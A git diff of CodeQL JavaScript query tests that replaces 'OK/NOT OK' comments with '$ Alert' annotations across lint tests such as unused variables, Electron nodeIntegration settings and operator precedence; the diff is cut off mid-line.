580680cdb682..c40e6c565daf 100644 --- a/javascript/ql/test/query-tests/Declarations/UnusedVariable/require-react-3.js +++ b/javascript/ql/test/query-tests/Declarations/UnusedVariable/require-react-3.js @@ -1,2 +1,2 @@ -var { React } = require("probably-react"); // OK +var { React } = require("probably-react"); (); diff --git a/javascript/ql/test/query-tests/Declarations/UnusedVariable/require-react-in-other-scope.js b/javascript/ql/test/query-tests/Declarations/UnusedVariable/require-react-in-other-scope.js index 9ba55169e39d..11f6763cf3f5 100644 --- a/javascript/ql/test/query-tests/Declarations/UnusedVariable/require-react-in-other-scope.js +++ b/javascript/ql/test/query-tests/Declarations/UnusedVariable/require-react-in-other-scope.js @@ -1,5 +1,5 @@ (function() { - var React = require("probably-react"); // NOT OK + var React = require("probably-react"); // $ Alert }) (function() { (); diff --git a/javascript/ql/test/query-tests/Declarations/UnusedVariable/thisparam.ts b/javascript/ql/test/query-tests/Declarations/UnusedVariable/thisparam.ts index 07f817e287a8..5791afc6ed5c 100644 --- a/javascript/ql/test/query-tests/Declarations/UnusedVariable/thisparam.ts +++ b/javascript/ql/test/query-tests/Declarations/UnusedVariable/thisparam.ts @@ -1,4 +1,4 @@ -import { Foo, Bar, Baz } from "somewhere"; // OK +import { Foo, Bar, Baz } from "somewhere"; export function f(this: Foo) {} diff --git a/javascript/ql/test/query-tests/Declarations/UnusedVariable/typeInTemplateLiteralTag.ts b/javascript/ql/test/query-tests/Declarations/UnusedVariable/typeInTemplateLiteralTag.ts index 8b157c18f8df..07c3bb0c50dc 100644 --- a/javascript/ql/test/query-tests/Declarations/UnusedVariable/typeInTemplateLiteralTag.ts +++ b/javascript/ql/test/query-tests/Declarations/UnusedVariable/typeInTemplateLiteralTag.ts @@ -1,6 +1,6 @@ -import { SomeInterface } from 'somwhere1'; // OK -import { AnotherInterface } from 'somwhere2'; // OK -import { foo } from 'somewhere3'; // OK +import { SomeInterface } from 'somwhere1'; +import { AnotherInterface } from 'somwhere2'; +import { foo } from 'somewhere3'; let x = "world"; diff --git a/javascript/ql/test/query-tests/Declarations/UnusedVariable/typeoftype.ts b/javascript/ql/test/query-tests/Declarations/UnusedVariable/typeoftype.ts index 3a4c417daec3..5c5085a37285 100644 --- a/javascript/ql/test/query-tests/Declarations/UnusedVariable/typeoftype.ts +++ b/javascript/ql/test/query-tests/Declarations/UnusedVariable/typeoftype.ts @@ -1,12 +1,12 @@ -import fs = require('fs') // OK -import http = require('http') // OK +import fs = require('fs') +import http = require('http') export var mockFs : typeof fs = {} export var mockRequest : typeof http.ServerRequest = {} export function f() { - let x = 4 // OK - let y = 5 // NOT OK + let x = 4 + let y = 5 // $ Alert var t : typeof x = 20 return t } diff --git a/javascript/ql/test/query-tests/Declarations/UnusedVariable/types.d.ts b/javascript/ql/test/query-tests/Declarations/UnusedVariable/types.d.ts index 130a2a1db926..62a86545a4e0 100644 --- a/javascript/ql/test/query-tests/Declarations/UnusedVariable/types.d.ts +++ b/javascript/ql/test/query-tests/Declarations/UnusedVariable/types.d.ts @@ -1 +1 @@ -declare class UnusedClass {} // OK +declare class UnusedClass {} diff --git a/javascript/ql/test/query-tests/Declarations/UnusedVariable/underscore.js b/javascript/ql/test/query-tests/Declarations/UnusedVariable/underscore.js index 75eade9c6f82..e25cb72b32a5 100644 --- a/javascript/ql/test/query-tests/Declarations/UnusedVariable/underscore.js +++ b/javascript/ql/test/query-tests/Declarations/UnusedVariable/underscore.js @@ -1,10 +1,10 @@ function f(a) { - const [a, // OK: used - _, // OK: starts with underscore - _c, // OK: starts with underscore - d, // OK: used - e, // NOT OK - f] // NOT OK + const [a, // OK - used + _, // OK - starts with underscore + _c, // OK - starts with underscore + d, // OK - used + e, // $ Alert + f] // $ Alert = a; return a + d; } diff --git a/javascript/ql/test/query-tests/Declarations/UnusedVariable/unusedShadowed.ts b/javascript/ql/test/query-tests/Declarations/UnusedVariable/unusedShadowed.ts index 14ec99e02b5c..a04efbed8e1c 100644 --- a/javascript/ql/test/query-tests/Declarations/UnusedVariable/unusedShadowed.ts +++ b/javascript/ql/test/query-tests/Declarations/UnusedVariable/unusedShadowed.ts @@ -1,6 +1,6 @@ -import T from 'somewhere'; // NOT OK: `T` is unused (it is shadowed by another T) -import object from 'somewhere'; // NOT OK: `object` is unused (it is "shadowed" by a keyword) -import * as N from 'somewhere'; // OK: N is a namespace and thus not shadowed by 'interface N'. +import T from 'somewhere'; // $ Alert - `T` is unused (it is shadowed by another T) +import object from 'somewhere'; // $ Alert - `object` is unused (it is "shadowed" by a keyword) +import * as N from 'somewhere'; // OK - N is a namespace and thus not shadowed by 'interface N'. { var x: T = {}; diff --git a/javascript/ql/test/query-tests/Electron/NodeIntegration/EnablingNodeIntegration.js b/javascript/ql/test/query-tests/Electron/NodeIntegration/EnablingNodeIntegration.js index 5e1d0e95fb43..7cc8b5e4d5fb 100644 --- a/javascript/ql/test/query-tests/Electron/NodeIntegration/EnablingNodeIntegration.js +++ b/javascript/ql/test/query-tests/Electron/NodeIntegration/EnablingNodeIntegration.js @@ -1,7 +1,7 @@ const {BrowserWindow} = require('electron') function test() { - var unsafe_1 = { // NOT OK, both enabled + var unsafe_1 = { // $ Alert - both enabled webPreferences: { nodeIntegration: true, nodeIntegrationInWorker: true, @@ -11,7 +11,7 @@ function test() { } }; - var options_1 = { // NOT OK, `nodeIntegrationInWorker` enabled + var options_1 = { // $ Alert - `nodeIntegrationInWorker` enabled webPreferences: { plugins: true, nodeIntegrationInWorker: false, @@ -20,13 +20,13 @@ function test() { } }; - var pref = { // NOT OK, implicitly enabled + var pref = { // $ Alert - implicitly enabled plugins: true, webSecurity: true, sandbox: true }; - var options_2 = { // NOT OK, implicitly enabled + var options_2 = { // $ Alert - implicitly enabled webPreferences: pref, show: true, frame: true, @@ -34,7 +34,7 @@ function test() { minHeight: 300 }; - var safe_used = { // NOT OK, explicitly disabled + var safe_used = { // $ Alert - explicitly disabled webPreferences: { nodeIntegration: false, plugins: true, @@ -46,7 +46,7 @@ function test() { var w1 = new BrowserWindow(unsafe_1); var w2 = new BrowserWindow(options_1); var w3 = new BrowserWindow(safe_used); - var w4 = new BrowserWindow({width: 800, height: 600, webPreferences: {nodeIntegration: true}}); // NOT OK, `nodeIntegration` enabled + var w4 = new BrowserWindow({width: 800, height: 600, webPreferences: {nodeIntegration: true}}); // $ Alert - `nodeIntegration` enabled var w5 = new BrowserWindow(options_2); var w6 = new BrowserWindow(safe_used); } diff --git a/javascript/ql/test/query-tests/Expressions/BitwiseSignCheck/tst.js b/javascript/ql/test/query-tests/Expressions/BitwiseSignCheck/tst.js index 3006b9d28826..4ee166b91873 100644 --- a/javascript/ql/test/query-tests/Expressions/BitwiseSignCheck/tst.js +++ b/javascript/ql/test/query-tests/Expressions/BitwiseSignCheck/tst.js @@ -6,18 +6,16 @@ console.log(bitIsSet(-1, 31)); // prints 'false' (x & 3) > 0; // this is fine -// OK + x = -1; console.log((x | 0) > (0)); // prints 'false' -// NOT OK -console.log((x >>> 0) > 0); // prints 'true' +console.log((x >>> 0) > 0); // prints 'true' // $ Alert + -// OK console.log((x << 16 >> 16) > 0); // prints 'false' -// OK + (x & 256) > 0; -// NOT OK -(x & 0x100000000) > 0; \ No newline at end of file +(x & 0x100000000) > 0; // $ Alert \ No newline at end of file diff --git a/javascript/ql/test/query-tests/Expressions/CompareIdenticalValues/tst.js b/javascript/ql/test/query-tests/Expressions/CompareIdenticalValues/tst.js index e6b2568239f0..82c34116c62e 100644 --- a/javascript/ql/test/query-tests/Expressions/CompareIdenticalValues/tst.js +++ b/javascript/ql/test/query-tests/Expressions/CompareIdenticalValues/tst.js @@ -12,34 +12,33 @@ Rectangle.prototype.contains = function(x, y) { y < this.y+this.height); }; -// OK + "true" == true; -// OK + f() != f(23); -// NOT OK -(function() { }) == (function() {}); +(function() { }) == (function() {}); // $ Alert + - // OK x === y; -// OK + true === false; -// OK + function isNan(n) { return n !== n; } -// OK + function checkNaN(x) { if (x === x) // check whether x is NaN return false; return true; } -// OK (though wrong in other ways) +// OK - though wrong in other ways function same(x, y) { if (x === y) return true; diff --git a/javascript/ql/test/query-tests/Expressions/DuplicateProperty/tst.js b/javascript/ql/test/query-tests/Expressions/DuplicateProperty/tst.js index 3bf5add29910..aa9e955fdd08 100644 --- a/javascript/ql/test/query-tests/Expressions/DuplicateProperty/tst.js +++ b/javascript/ql/test/query-tests/Expressions/DuplicateProperty/tst.js @@ -1,12 +1,12 @@ var duplicate = { - "key": "value", // NOT OK: duplicated on line 5 + "key": "value", // $ Alert - duplicated on line 5 " key": "value", - "1": "value", // NOT OK: duplicated on line 11 - "key": "value", // NOT OK: duplicated on next line - 'key': "value", // NOT OK: duplicated on next line - key: "value", // NOT OK: duplicated on next line - \u006bey: "value", // NOT OK: duplicated on next line - "\u006bey": "value", // NOT OK: duplicated on next line + "1": "value", // $ Alert - duplicated on line 11 + "key": "value", // $ Alert - duplicated on next line + 'key': "value", // $ Alert - duplicated on next line + key: "value", // $ Alert - duplicated on next line + \u006bey: "value", // $ Alert - duplicated on next line + "\u006bey": "value", // $ Alert - duplicated on next line "\x6bey": "value", 1: "value" }; diff --git a/javascript/ql/test/query-tests/Expressions/ExprHasNoEffect/es2015.js b/javascript/ql/test/query-tests/Expressions/ExprHasNoEffect/es2015.js index f543395bc87c..07a81208a4ce 100644 --- a/javascript/ql/test/query-tests/Expressions/ExprHasNoEffect/es2015.js +++ b/javascript/ql/test/query-tests/Expressions/ExprHasNoEffect/es2015.js @@ -1,6 +1,6 @@ function* foo(){ var index = 0; while(index <= 2) - // OK + yield index++; } diff --git a/javascript/ql/test/query-tests/Expressions/ExprHasNoEffect/should.js b/javascript/ql/test/query-tests/Expressions/ExprHasNoEffect/should.js index 2bb1d46c4062..6b5b599f4b00 100644 --- a/javascript/ql/test/query-tests/Expressions/ExprHasNoEffect/should.js +++ b/javascript/ql/test/query-tests/Expressions/ExprHasNoEffect/should.js @@ -20,7 +20,7 @@ var myComplicatedPropertyDescriptor = (function(k) { })("get"); Object.defineProperty(Object.prototype, 'foo', myComplicatedPropertyDescriptor); -// OK: getters +// OK - getters (false).should.be.ok; (false).should; should.prototype.be; diff --git a/javascript/ql/test/query-tests/Expressions/ExprHasNoEffect/try.js b/javascript/ql/test/query-tests/Expressions/ExprHasNoEffect/try.js index a665423bd815..36bf5253ebdf 100644 --- a/javascript/ql/test/query-tests/Expressions/ExprHasNoEffect/try.js +++ b/javascript/ql/test/query-tests/Expressions/ExprHasNoEffect/try.js @@ -19,7 +19,7 @@ function try2(x) { function try3(x) { try { x.ordinaryProperty() - x.ordinaryProperty // NOT OK + x.ordinaryProperty // $ Alert return x; } catch (e) { return false; diff --git a/javascript/ql/test/query-tests/Expressions/ExprHasNoEffect/tst.js b/javascript/ql/test/query-tests/Expressions/ExprHasNoEffect/tst.js index e58a785b5aac..11fde389f858 100644 --- a/javascript/ql/test/query-tests/Expressions/ExprHasNoEffect/tst.js +++ b/javascript/ql/test/query-tests/Expressions/ExprHasNoEffect/tst.js @@ -1,83 +1,82 @@ -'use strict'; // OK -'use struct'; // OK (flagged by UnknownDirective.ql) -23; // NOT OK -void(23); // OK -23, foo(); // NOT OK -foo(23, 42); // OK -foo((23, bar())); // NOT OK -foo((bar(), 23)); // OK -1,f(); // NOT OK - -// OK +'use strict'; +'use struct'; // OK - flagged by UnknownDirective.ql +23; // $ Alert +void(23); +23, foo(); // $ Alert +foo(23, 42); +foo((23, bar())); // $ Alert +foo((bar(), 23)); +1,f(); // $ Alert + + /** * @type {function(int) : string} */ String.prototype.slice; -// OK + /** @typedef {(string|number)} */ goog.NumberLike; -// NOT OK -/** Useless */ +/** Useless */ // $ Alert x; -// OK (magic DOM property) +// OK - magic DOM property elt.clientTop; -// OK (xUnit fixture) +// OK - xUnit fixture [Fixture] function tst() {} -// OK: bad style, but most likely intentional +// OK - bad style, but most likely intentional (0, o.m)(); (0, o["m"])(); function tst() { - // OK: bad style, but most likely intentional + // OK - bad style, but most likely intentional (0, eval)("42"); } function f() { var x; - "foo"; // NOT OK + "foo"; // $ Alert } try { doSomethingDangerous(); } catch(e) { - new Error("Told you so"); // NOT OK - new SyntaxError("Why didn't you listen to me?"); // NOT OK - new Error(computeSnarkyMessage(e)); // NOT OK - new UnknownError(); // OK + new Error("Told you so"); // $ Alert + new SyntaxError("Why didn't you listen to me?"); // $ Alert + new Error(computeSnarkyMessage(e)); // $ Alert + new UnknownError(); } function g() { var o = {}; Object.defineProperty(o, "trivialGetter1", { get: function(){} }); - o.trivialGetter1; // OK + o.trivialGetter1; Object.defineProperty(o, "trivialNonGetter1", "foo"); - o.trivialNonGetter1; // NOT OK + o.trivialNonGetter1; // $ Alert var getterDef1 = { get: function(){} }; Object.defineProperty(o, "nonTrivialGetter1", getterDef1); - o.nonTrivialGetter1; // OK + o.nonTrivialGetter1; var getterDef2 = { }; unknownPrepareGetter(getterDef2); Object.defineProperty(o, "nonTrivialNonGetter1", getterDef2); - o.nonTrivialNonGetter1; // OK + o.nonTrivialNonGetter1; Object.defineProperty(o, "nonTrivialGetter2", unknownGetterDef()); - o.nonTrivialGetter2; // OK + o.nonTrivialGetter2; - (o: empty); // OK + (o: empty); - testSomeCondition() ? o : // NOT OK + testSomeCondition() ? o : // $ Alert doSomethingDangerous(); - consume(testSomeCondition() ? o : // OK + consume(testSomeCondition() ? o : doSomethingDangerous()); }; diff --git a/javascript/ql/test/query-tests/Expressions/ExprHasNoEffect/tst2.js b/javascript/ql/test/query-tests/Expressions/ExprHasNoEffect/tst2.js index 62f64f2f729a..0e66a95c166e 100644 --- a/javascript/ql/test/query-tests/Expressions/ExprHasNoEffect/tst2.js +++ b/javascript/ql/test/query-tests/Expressions/ExprHasNoEffect/tst2.js @@ -1,4 +1,3 @@ function tst2(eval) { - // NOT OK - (0, eval)("42"); + (0, eval)("42"); // $ Alert } diff --git a/javascript/ql/test/query-tests/Expressions/HeterogeneousComparison/tst.js b/javascript/ql/test/query-tests/Expressions/HeterogeneousComparison/tst.js index f500d4cdafce..a3b6b1fea45e 100644 --- a/javascript/ql/test/query-tests/Expressions/HeterogeneousComparison/tst.js +++ b/javascript/ql/test/query-tests/Expressions/HeterogeneousComparison/tst.js @@ -1,137 +1,128 @@ -// NOT OK -if (typeof window !== undefined) +if (typeof window !== undefined) // $ Alert console.log("browser"); -// OK + if (typeof window === "undefined") console.log("not a browser"); -// NOT OK -if ("Hello, world".indexOf("Hello" >= 0)) +if ("Hello, world".indexOf("Hello" >= 0)) // $ Alert console.log("It's in there."); -// OK + true < 1; -// OK + undefined == null; -// NOT OK -null == 0; +null == 0; // $ Alert -// NOT OK -switch ("hi") { +switch ("hi") { // $ Alert case 42: } -// NOT OK -Object.toString() + "!" == undefined; +Object.toString() + "!" == undefined; // $ Alert -// NOT OK -(+f() || !g() || (h() + k())) == undefined; +(+f() || !g() || (h() + k())) == undefined; // $ Alert -// NOT OK -if (!Module['load'] == 'undefined') { +if (!Module['load'] == 'undefined') { // $ Alert } function f(x) { return true; - // OK + return x === 42; } function g() { var number = 0; // number - // OK + number == "0"; - // NO OK - number == "zero"; + + number == "zero"; // $ Alert } -// NOT OK -0 < (Math.random() > 0.5 ? void 0 : [1, 2]); +0 < (Math.random() > 0.5 ? void 0 : [1, 2]); // $ Alert + -// OK '100' < 1000; -// OK (fvsvo "OK") +// OK - fvsvo "OK" 100 > ''; -// OK + new Date('foo') == 'Invalid Date'; -// OK + new String('bar') == 'bar'; -// OK + ({ valueOf: () => true } == true); -// OK + ({ valueOf: () => 42 } == 42); -// OK + ({ valueOf: () => 'hi' } == 'hi'); -// OK + ({ valueOf: () => null } == null); -// NOT OK, but not currently flagged since we conservatively -// assume that `new Date(123)` could return any object, not necessarily a Date +// assume that `new Date(123)` could return any object, not necessarily a Date // $ Alert - but not currently flagged since we conservatively new Date(123) == 123 function f(x1, x2, x3, x4, x5, x6){ - typeof x1 === 'object' && x1 !== null; // OK + typeof x1 === 'object' && x1 !== null; if (!x2) { x2 = new Error(); } - typeof x2 === 'object' && x2 !== null; // NOT OK: x2 cannot be null here + typeof x2 === 'object' && x2 !== null; // $ Alert - x2 cannot be null here if (x3) { - typeof x3 === 'object' && x3 !== null; // NOT OK: x3 cannot be null here + typeof x3 === 'object' && x3 !== null; // $ Alert - x3 cannot be null here } if (!x4) { - typeof x4 === 'object' && x4 !== null; // OK + typeof x4 === 'object' && x4 !== null; } if (!x5) { x5 = new Error(); } - x5 !== null; // NOT OK: x2 cannot be null here + x5 !== null; // $ Alert - x2 cannot be null here if (x6) { - x6 !== null; // NOT OK: x3 cannot be null here + x6 !== null; // $ Alert - x3 cannot be null here } } function g() { var o = {}; - o < "def"; // NOT OK + o < "def"; // $ Alert var p = { toString() { return "abc"; } }; - p < "def"; // OK + p < "def"; function A() {} var a = new A(); - a < "def"; // NOT OK + a < "def"; // $ Alert function B() {}; B.prototype = p; var b = new B(); - b < "def"; // OK + b < "def"; function C() { this.valueOf = function() { return 42; }; } var c = new C(); - c != 23; // OK + c != 23; null.valueOf = function() { return 42; }; - null == 42; // NOT OK + null == 42; // $ Alert true.valueOf = function() { return "foo" }; - true != "bar"; // NOT OK + true != "bar"; // $ Alert } @@ -139,54 +130,54 @@ function h() { var a = 42; var b = "42"; - a === "42"; // NOT OK - 42 === b // NOT OK - a === b; // NOT OK + a === "42"; // $ Alert + 42 === b // $ Alert + a === b; // $ Alert } function i() { "foo" === undefined - undefined === "foo" // NOT OK + undefined === "foo" // $ Alert var NaN = 0; // trick analysis to consider warning about NaN, for the purpose of testing pretty printing - NaN === "foo" // NOT OK + NaN === "foo" // $ Alert var Infinity = 0; // trick analysis to consider warning about Infinity, for the purpose of testing pretty printing - Infinity === "foo" // NOT OK + Infinity === "foo" // $ Alert } function k() { // tests for pretty printing of many types var t1 = 42; - t1 !== null; // NOT OK - null !== t1; // NOT OK + t1 !== null; // $ Alert + null !== t1; // $ Alert var t2 = unknown? t1: "foo"; - t2 !== null; // NOT OK - null !== t2; // NOT OK + t2 !== null; // $ Alert + null !== t2; // $ Alert var t3 = unknown? t2: undefined; - t3 !== null; // NOT OK - null !== t3; // NOT OK + t3 !== null; // $ Alert + null !== t3; // $ Alert var t4 = unknown? t3: true; - t4 !== null; // NOT OK - null !== t4; // NOT OK + t4 !== null; // $ Alert + null !== t4; // $ Alert var t5 = unknown? t4: function(){}; - t5 !== null; // NOT OK - null !== t5; // NOT OK + t5 !== null; // $ Alert + null !== t5; // $ Alert var t6 = unknown? t5: /t/; - t6 !== null; // NOT OK - null !== t6; // NOT OK + t6 !== null; // $ Alert + null !== t6; // $ Alert var t7 = unknown? t6: {}; - t7 !== null; // NOT OK - null !== t7; // NOT OK + t7 !== null; // $ Alert + null !== t7; // $ Alert var t8 = unknown? t8: new Symbol(); - t8 !== null; // NOT OK - null !== t8; // NOT OK + t8 !== null; // $ Alert + null !== t8; // $ Alert } @@ -199,22 +190,22 @@ function l() { var t4 = unknown? 42: unknown? "foo": unknown? undefined: true; var t5 = unknown? t4: null - t2 !== t4; // NOT OK - t4 !== t2; // NOT OK - t3 !== t4; // NOT OK - t4 !== t3; // NOT OK + t2 !== t4; // $ Alert + t4 !== t2; // $ Alert + t3 !== t4; // $ Alert + t4 !== t3; // $ Alert - t2 !== t5; // NOT OK - t5 !== t2; // NOT OK - t3 !== t5; // NOT OK - t5 !== t3; // NOT OK + t2 !== t5; // $ Alert + t5 !== t2; // $ Alert + t3 !== t5; // $ Alert + t5 !== t3; // $ Alert } -1n == 1; // OK +1n == 1; (function tooGeneralLocalFunctions(){ function f1(x) { - if (x === "foo") { // OK, whitelisted + if (x === "foo") { // OK - whitelisted } } @@ -222,7 +213,7 @@ function l() { function f2(x, y) { var xy = o.q? x: y; - if (xy === "foo") { // NOT OK (not whitelisted like above) + if (xy === "foo") { // $ Alert - not whitelisted like above } } diff --git a/javascript/ql/test/query-tests/Expressions/ImplicitOperandConversion/tst.js b/javascript/ql/test/query-tests/Expressions/ImplicitOperandConversion/tst.js index 811ef9c576c9..523535b640e5 100644 --- a/javascript/ql/test/query-tests/Expressions/ImplicitOperandConversion/tst.js +++ b/javascript/ql/test/query-tests/Expressions/ImplicitOperandConversion/tst.js @@ -1,41 +1,36 @@ -// NOT OK -!method in obj; +!method in obj; // $ Alert + -// OK !(method in obj); -// OK + '__proto__' in obj; -// OK + 0 in obj; -// OK + ('$' + key) in obj; -// NOT OK -p in null; +p in null; // $ Alert + +0 in 'string'; // $ Alert -// NOT OK -0 in 'string'; -// OK p in {}; -// NOT OK -console.log("Setting device's bluetooth name to '%s'" % device_name); +console.log("Setting device's bluetooth name to '%s'" % device_name); // $ Alert -// NOT OK -if (!callback || !callback instanceof Function) { +if (!callback || !callback instanceof Function) { // $ Alert ; } -// OK + function cmp(x, y) { return (x > y) - (x < y); } -// OK + function cmp(x, y) { if (x > y) return 1; @@ -44,48 +39,42 @@ function cmp(x, y) { return 0; } -// OK + function cmp(x, y) { return (x > y) - (x < y); } -// NOT OK -1 + void 0 +1 + void 0 // $ Alert + -// OK o[true] = 42; function f() { var x; - // NOT OK - x -= 2; + x -= 2; // $ Alert } function g() { var x = 19, y; - // NOT OK - x %= y; + x %= y; // $ Alert } function h() { var x; - // NOT OK - ++x; + ++x; // $ Alert } function k() { var name; - // NOT OK - return `Hello ${name}!`; + return `Hello ${name}!`; // $ Alert } function l() { var x; - // NOT OK - x ** 2; + x ** 2; // $ Alert } -1n + 1; // NOT OK, but not currently flagged +1n + 1; // $ MISSED: Alert (function(){ let sum = 0; @@ -114,10 +103,10 @@ function l() { function m() { var x = 19, y = "string"; - x %= y; // NOT OK - x += y; // OK - x ||= y; // OK - x &&= y; // OK - x ??= y; // OK - x >>>= y; // NOT OK + x %= y; // $ Alert + x += y; + x ||= y; + x &&= y; + x ??= y; + x >>>= y; // $ Alert } diff --git a/javascript/ql/test/query-tests/Expressions/MissingAwait/tsTest.ts b/javascript/ql/test/query-tests/Expressions/MissingAwait/tsTest.ts index 4362c11a8e67..5f1774f1ab56 100644 --- a/javascript/ql/test/query-tests/Expressions/MissingAwait/tsTest.ts +++ b/javascript/ql/test/query-tests/Expressions/MissingAwait/tsTest.ts @@ -1,5 +1,5 @@ declare let cache: { [x: string]: Promise }; function deleteCache(x: string) { - delete cache[x]; // OK + delete cache[x]; } diff --git a/javascript/ql/test/query-tests/Expressions/MissingAwait/tst.js b/javascript/ql/test/query-tests/Expressions/MissingAwait/tst.js index 10fc244dbc44..28e95513d401 100644 --- a/javascript/ql/test/query-tests/Expressions/MissingAwait/tst.js +++ b/javascript/ql/test/query-tests/Expressions/MissingAwait/tst.js @@ -5,24 +5,24 @@ async function getThing() { function useThing() { let thing = getThing(); - if (thing === undefined) {} // NOT OK + if (thing === undefined) {} // $ Alert - if (thing == null) {} // NOT OK + if (thing == null) {} // $ Alert - something(thing ? 1 : 2); // NOT OK + something(thing ? 1 : 2); // $ Alert - for (let x in thing) { // NOT OK + for (let x in thing) { // $ Alert something(x); } let obj = something(); - something(obj[thing]); // NOT OK - obj[thing] = 5; // NOT OK + something(obj[thing]); // $ Alert + obj[thing] = 5; // $ Alert - something(thing + "bar"); // NOT OK + something(thing + "bar"); // $ Alert if (something()) { - if (thing) { // NOT OK + if (thing) { // $ Alert something(3); } } @@ -31,21 +31,21 @@ function useThing() { async function useThingCorrectly() { let thing = await getThing(); - if (thing === undefined) {} // OK + if (thing === undefined) {} - if (thing == null) {} // OK + if (thing == null) {} - return thing + "bar"; // OK + return thing + "bar"; } async function useThingCorrectly2() { let thing = getThing(); - if (await thing === undefined) {} // OK + if (await thing === undefined) {} - if (await thing == null) {} // OK + if (await thing == null) {} - return thing + "bar"; // NOT OK + return thing + "bar"; // $ Alert } function getThingSync() { @@ -55,21 +55,21 @@ function getThingSync() { function useThingPossiblySync(b) { let thing = b ? getThing() : getThingSync(); - if (thing === undefined) {} // OK + if (thing === undefined) {} - if (thing == null) {} // OK + if (thing == null) {} - return thing + "bar"; // NOT OK - but we don't flag it + return thing + "bar"; // $ MISSED: Alert } function useThingInVoid() { - void getThing(); // OK + void getThing(); } function useThing() { if (random()) { - return getThing() ?? null; // NOT OK + return getThing() ?? null; // $ Alert } else { - return getThing?.() ?? null; // OK + return getThing?.() ?? null; } -} \ No newline at end of file +} diff --git a/javascript/ql/test/query-tests/Expressions/MissingDotLengthInComparison/MissingDotLengthInComparison.js b/javascript/ql/test/query-tests/Expressions/MissingDotLengthInComparison/MissingDotLengthInComparison.js index cbfe6d3250e5..d12e82cb8c24 100644 --- a/javascript/ql/test/query-tests/Expressions/MissingDotLengthInComparison/MissingDotLengthInComparison.js +++ b/javascript/ql/test/query-tests/Expressions/MissingDotLengthInComparison/MissingDotLengthInComparison.js @@ -1,6 +1,6 @@ function total(bad) { var sum = 0 - for (var i = 0; i < bad; ++i) { // NOT OK + for (var i = 0; i < bad; ++i) { // $ Alert sum += bad[i] } return sum @@ -8,7 +8,7 @@ function total(bad) { function total_good(good) { var sum = 0 - for (var i = 0; i < good.length; ++i) { // OK + for (var i = 0; i < good.length; ++i) { sum += good[i] } return sum @@ -17,21 +17,21 @@ function total_good(good) { var fruits = ["banana", "pineapple"] function mix() { var drink = [] - for (var i = 0; i < fruits; ++i) { // NOT OK + for (var i = 0; i < fruits; ++i) { // $ Alert drink.push(fruits[i]) } } function mix_good() { var drink = [] - for (var i = 0; i < fruits.length; ++i) { // OK + for (var i = 0; i < fruits.length; ++i) { drink.push(fruits[i]) } } function overloaded(mode, foo, bar) { if (mode == "floo") { - return foo < bar; // OK + return foo < bar; } else if (mode == "blar") { return foo[bar]; } else { @@ -41,7 +41,7 @@ function overloaded(mode, foo, bar) { function overloaded_no_else(mode, foo, bar) { if (mode == "floo") { - return foo < bar; // OK + return foo < bar; } if (mode == "blar") { return foo[bar]; @@ -50,7 +50,7 @@ function overloaded_no_else(mode, foo, bar) { function reassigned(index, object) { var tmp = object.getMaximum() - if (index < tmp) { // OK + if (index < tmp) { tmp = object.getArray() return tmp[index] } diff --git a/javascript/ql/test/query-tests/Expressions/MisspelledIdentifier/tst.js b/javascript/ql/test/query-tests/Expressions/MisspelledIdentifier/tst.js index 101c6b360b48..5016873b6a59 100644 --- a/javascript/ql/test/query-tests/Expressions/MisspelledIdentifier/tst.js +++ b/javascript/ql/test/query-tests/Expressions/MisspelledIdentifier/tst.js @@ -1,43 +1,40 @@ // use of .length to prime the query a.length; -// NOT OK -for (var i=0; i -
// OK +
} @@ -24,20 +24,20 @@ class Component1 extends React.Component { render() { var unbound3 = this.unbound3; return
-
// NOT OK -
// NOT OK -
// NOT OK -
// OK -
// OK -
// OK -
// OK -
this.unbound_butInvokedSafely(e)}/> // OK -
// OK -
// OK -
// OK -
// OK -
// OK -
// OK +
// $ Alert +
// $ Alert +
// $ Alert +
+
+
+
+
this.unbound_butInvokedSafely(e)}/> +
+
+
+
+
+
} @@ -125,7 +125,7 @@ class Component2 extends React.Component { render() { return
-
// OK +
; } @@ -139,7 +139,7 @@ class Component3 extends React.Component { render() { return
-
// OK +
} @@ -159,7 +159,7 @@ class Component4 extends React.Component { render() { return
-
// OK +
} @@ -177,7 +177,7 @@ class Component5 extends React.Component { render() { return
-
// OK +
} diff --git a/javascript/ql/test/query-tests/Expressions/UnclearOperatorPrecedence/tst.js b/javascript/ql/test/query-tests/Expressions/UnclearOperatorPrecedence/tst.js index 5490b0b4232a..9aa369d69b21 100644 --- a/javascript/ql/test/query-tests/Expressions/UnclearOperatorPrecedence/tst.js +++ b/javascript/ql/test/query-tests/Expressions/UnclearOperatorPrecedence/tst.js @@ -1,10 +1,10 @@ -x.f() & 0x0A != 0; // NOT OK -x.f() & (0x0A != 0); // OK -x.f() & 0x0A != 0; // OK -x.f() & 0x0A!=0; // OK +x.f() & 0x0A != 0; // $ Alert +x.f() & (0x0A != 0); +x.f() & 0x0A != 0; +x.f() & 0x0A!=0; -x !== y & 1; // NOT OK +x !== y & 1; // $ Alert -x > 0 & x < 10; // OK +x > 0 & x < 10; -a&b==c; // NOT OK +a&b==c; // $ Alert diff --git a/javascript/ql/test/query-tests/Expressions/UnclearOperatorPrecedence/tst.min.js b/javascript/ql/test/query-tests/Expressions/UnclearOperatorPrecedence/tst.min.js index 800b7b08df2c..d39838870c81 100644 --- a/javascript/ql/test/query-tests/Expressions/UnclearOperatorPrecedence/tst.min.js +++ b/javascript/ql/test/query-tests/Expressions/UnclearOperatorPrecedence/tst.min.js @@ -1 +1 @@ -a&b==c; // OK (minified file) +a&b==c; // OK - minified file diff --git a/javascript/ql/test/query-tests/Expressions/UnknownDirective/UnknownDirective.html b/javascript/ql/test/query-tests/Expressions/UnknownDirective/UnknownDirective.html index 87f969c3e179..03ac0651186e 100644 --- a/javascript/ql/test/query-tests/Expressions/UnknownDirective/UnknownDirective.html +++ b/javascript/ql/test/query-tests/Expressions/UnknownDirective/UnknownDirective.html @@ -1,6 +1,6 @@ - - - + + + diff --git a/javascript/ql/test/query-tests/Expressions/UnknownDirective/UnknownDirective.js b/javascript/ql/test/query-tests/Expressions/UnknownDirective/UnknownDirective.js index 0645f8821a1d..f958714431d6 100644 --- a/javascript/ql/test/query-tests/Expressions/UnknownDirective/UnknownDirective.js +++ b/javascript/ql/test/query-tests/Expressions/UnknownDirective/UnknownDirective.js @@ -1,51 +1,51 @@ -"use foo"; // NOT OK -"use strict"; // NOT OK +"use foo"; // $ Alert +"use strict"; // $ Alert function bad() { - "'use strict'"; // NOT OK - "use strict;"; // NOT OK - "'use strict';"; // NOT OK - "'use strict;'"; // NOT OK - "use-strict"; // NOT OK - "use_strict"; // NOT OK - "uses strict"; // NOT OK - "use struct;" // NOT OK - "Use Strict"; // NOT OK - "use 